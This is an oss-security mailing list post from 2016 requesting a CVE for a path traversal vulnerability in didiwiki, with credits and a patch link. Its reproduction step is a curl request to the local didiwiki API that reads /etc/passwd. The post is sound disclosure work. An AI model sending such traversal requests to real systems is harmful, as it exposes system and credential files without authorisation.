Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 18 Feb 2016 18:02:21 -0500
From: Ignace Mouzannar <mouzannar@...il.com>
To: oss-security@...ts.openwall.com
Cc: security@...ian.org, Alexander Izmailov <yarolig@...il.com>
Subject: CVE request: didiwiki path traversal vulnerability

Hello,

Please can I have a CVE assigned to the following vulnerability?

- Versions Affected: all versions of didiwiki
- Bug discovered by: Alexander Izmailov
- Patch Available: https://github.com/OpenedHand/didiwiki/pull/1/files
- Patch provided by: Alexander Izmailov
- Description:

Allows a user to access any file on the filesystem from the browser.
To reproduce it, on Debian:
----
apt-get install didiwiki

curl http://localhost:8000/api/page/get?page=/etc/passwd
----

Thank you for your help.

 Ignace M

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ